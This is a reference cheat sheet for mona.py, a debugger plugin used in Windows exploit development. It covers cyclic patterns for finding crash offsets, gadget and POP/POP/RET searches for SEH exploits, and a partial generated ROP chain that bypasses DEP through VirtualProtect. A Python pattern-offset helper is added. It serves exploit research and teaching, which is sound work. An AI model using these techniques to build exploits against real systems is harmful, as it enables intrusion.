Mona.py Exploit Cheatsheet

This document provides a cheat sheet for using the Mona.py tool to analyze crashes and facilitate exploit development. It outlines commands for configuring Mona, searching for pointers and patterns in memory, finding code snippets, generating cyclic patterns, and automating ROP chain generation for bypassing DEP. The document explains how to use Mona to suggest exploit primitives after a crash, find useful gadgets like POP/POP/RET sequences, and provide starting points for ROP payloads.

===========================

A LITTLE MONA.PY CHEATSHEET


===========================

Last modified: 08/12/2011


Author: luca.mella@studio.unibo.it

************************************************************************
*** Configuration ******************************************************
************************************************************************

!mona config -set workingfolder c:\logs\%p


Set the current working folder. Mona will write its output here.
You can also use -get to retrieve the current working folder.
(%p means process name)

-cm <option>=true/false
Module criteria: only consider modules whose properties match. Options:
safeseh
aslr
os
rebase

************************************************************************
*** General searching options ******************************************
************************************************************************

-cp <option>,<option>
Pointer criteria: only return pointers whose properties match. Options:
nonull
unicode 00xx00yy
ascii
asciiprint
upper
lower
uppernum
lowernum
numeric
alphanum
startswithnull 00xxyyzz

-cpb <badchars>
Exclude specified badchars from pointer search

-p <N>
Number of pointers to return

-x <level>
R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specified
access level

************************************************************************
*** Pattern ************************************************************
************************************************************************

!mona pc <size>
Create a cyclic pattern of <size> bytes. Same as "msf_pattern" in Metasploit.

!mona po <0x4bytes>
Find the offset of the specified 4 bytes within the cyclic pattern.

************************************************************************
*** After a crash with cyclic pattern payload **************************
************************************************************************

!mona suggest

Watch for output such as:


EIP overwritten with normal pattern : 0x37694136 (offset 260)
!!! %EBP+4
ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
EBP overwritten with normal pattern : 0x69413569 (offset 256)
EBX (0x0018f580) points at offset 276 in normal pattern (length 724)

--- output ---


0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Looking for cyclic pattern in memory
750F0000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000 bytes)
0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000 bytes)
0BADF00D [+] Examining registers
0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260)
0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256)
0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern (length 724)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack
0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) : 0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) : 0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) : 0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) : 0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) : 0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) : 0x0018f56c : offset 256, length 744
0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) : 0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) : 0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) : 0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) : 0x0018f580 : offset 276, length 724
0BADF00D [+] Preparing log file 'exploit.rb'
0BADF00D - (Re)setting logfile C:\mona_logs\exploit.rb
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
--- end of output ---
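
As an added example (not part of the original cheatsheet and not mona.py's own code), here is a small Python re-implementation of the Metasploit-style cyclic pattern that "!mona pc" and "!mona po" work with; it reproduces the EIP, EBP and ESP offsets reported in the "!mona suggest" output above. The pattern length (1000) and the register and pattern addresses are taken from that output; everything else is assumed.

```python
import string
import struct

# 26 uppercase * 26 lowercase * 10 digits, 3 bytes each: every 3-byte triplet
# (and therefore every 4-byte window) is unique, which is what makes the
# offset lookup unambiguous.
MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes

def cyclic_pattern(size):
    """Build the 'Aa0Aa1Aa2...' pattern (same scheme as !mona pc) of `size` bytes."""
    if size > MAX_PATTERN:
        raise ValueError("a pattern longer than %d bytes would repeat" % MAX_PATTERN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= size:
                    return bytes(out[:size])
    return bytes(out)

def pattern_offset(value, size=1000):
    """Offset of a 32-bit register value in the pattern, as !mona po reports it.
    Mona prints the register as an integer (EIP = 0x37694136); in memory those
    bytes are little-endian, so the pattern is searched for struct.pack('<I', ...).
    Returns None when the value is not in the pattern, i.e. the register was
    not overwritten by the pattern at all."""
    idx = cyclic_pattern(size).find(struct.pack("<I", value))
    return None if idx < 0 else idx

def address_offset(ptr, pattern_base, size=1000):
    """Offset for a register that points INTO the pattern (the 'ESP (...) points
    at offset N' lines): the distance from where mona found the pattern in
    memory. Returns None if the pointer lies outside the pattern."""
    off = ptr - pattern_base
    return off if 0 <= off < size else None

if __name__ == "__main__":
    # Register values and pattern address taken from the !mona suggest output.
    print("EIP offset:", pattern_offset(0x37694136))              # 260
    print("EBP offset:", pattern_offset(0x69413569))              # 256
    print("ESP offset:", address_offset(0x0018f574, 0x0018f46c))  # 264
```

The "(length 736)" mona prints next to ESP is simply the pattern length minus that offset (1000 - 264), i.e. how many pattern bytes remain from that register onward.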
************************************************************************
*** Finding things in memory *******************************************
************************************************************************

!mona find

Find a sequence of bytes in memory.


Mandatory argument : -s <pattern> : the sequence to search for.
-type <type> : Type of pattern to search for : bin,asc,ptr,instr,file
-b <address> : the bottom of the search range
-t <address> : the top of the search range
-c : skip consecutive pointers but show the length of the pattern instead
-p2p : show pointers to pointers to the pattern (might take a while !)
-r <number> : if -p2p is used, also find nearby pointers; the value is the
number of bytes to step backwards for each search

!mona find -type instr -s "jmp ebx" -m ntdll.dll

--- output ---


Search into module ntdll.dll
Search for "jmp ebx" as assembly instruction
Result:
0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385 (C:\Windows\SysWOW64\ntdll.dll)
--- end of output ---

************************************************************************
*** Assemble instructions **********************************************
************************************************************************

!mona assemble -s "nop"

Return the opcode of specified instructions (chain with '#').

************************************************************************
*** Searching for 'POP/POP/RET' instruction (SEH exploiting) ***********
************************************************************************

!mona seh

Find POP POP RET instruction sequences in program memory.

These sequences can be used in SEH exploitation.

--- output ---


0BADF00D [+] Writing results to C:\mona_logs\seh.txt
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret ' : 3
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 3
0BADF00D - Number of pointers of type 'pop ecx # pop ebx # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret ' : 3
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret 04' : 2
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret ' : 15
0BADF00D - Number of pointers of type 'pop ecx # pop edi # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 0c' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 6
0BADF00D - Number of pointers of type 'jmp dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 08' : 2
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 04' : 2
0BADF00D - Number of pointers of type 'call dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 04' : 14
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
0BADF00D - Number of pointers of type 'pop edi # pop ebx # ret ' : 1
[..]
--- end of output ---

************************************************************************
*** ROP based exploit **************************************************
************************************************************************

!mona rop -m <NONASLRMODULES>

Analyze memory and prepare several lists: valid ROP gadgets (any INSTR + RET
sequence), stack pivots and ROP functions. Generate a ROP chain aimed at
bypassing DEP (a call to VirtualProtect using the PUSHAD technique) and
suggest which addresses need to be fixed to make it work.

NOTE:
Watch "C:\mona_logs\rop_suggestion.txt" for a clean gadget list.
Watch "C:\mona_logs\rop_virtualprotect.txt" for a starting point for
your ROP payload (aimed at DEP bypass).
Watch "C:\mona_logs\stack_pivot.txt" for a list of gadgets that change ESP.

--- output ---


---------- Mona command started on 2011-07-21 10:58:09 ----------
[..]
VirtualProtect register structure (PUSHAD technique)
----------------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (Writable ptr)
EDX = NewProtect (0x40)
EBX = Size
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp -n -o')
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)

VirtualProtect() 'pushad' rop chain
------------------------------------
rop_gadgets =
[
0x00404880, # POP ECX # RETN (server.exe)
0x????????, # <- *&VirtualProtect()
0x00406a48, # MOV EAX,DWORD PTR DS:[ECX] # ADD EAX,ECX # RETN (server.exe)
0x????????, # ** <- find routine to move virtualprotect() into esi
            # ** Hint : look for mov [esp+offset],eax and pop esi
0x????????, # couldn't find a pointer to put ptr to 'jmp esp' into ebp
0x????????, # <- put pointer to payload here
0x00403e04, # POP EBX # RETN (server.exe)
0x00000201, # <- change size to mark as executable if needed (-> ebx)
0x00404880, # POP ECX # RETN (server.exe)
0x00409000, # RW pointer (lpOldProtect) (-> ecx)
0x00404be4, # POP EDI # RETN (server.exe)
0x00404be5, # ROP NOP (-> edi)
0x0040431c, # POP EDX # RETN (server.exe)
0x00000040, # newProtect (0x40) (-> edx)
0x00404a84, # POP EAX # RETN (server.exe)
0x90909090, # NOPS (-> eax)
0x004022e0, # PUSHAD # RETN (server.exe)
# rop chain generated by mona.py
# note : this chain may not work out of the box
# you may have to change order or fix some gadgets,
# but it should give you a head start
].pack("V*")
[..]
--- end of output ---

========================================================================
Reference:
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/
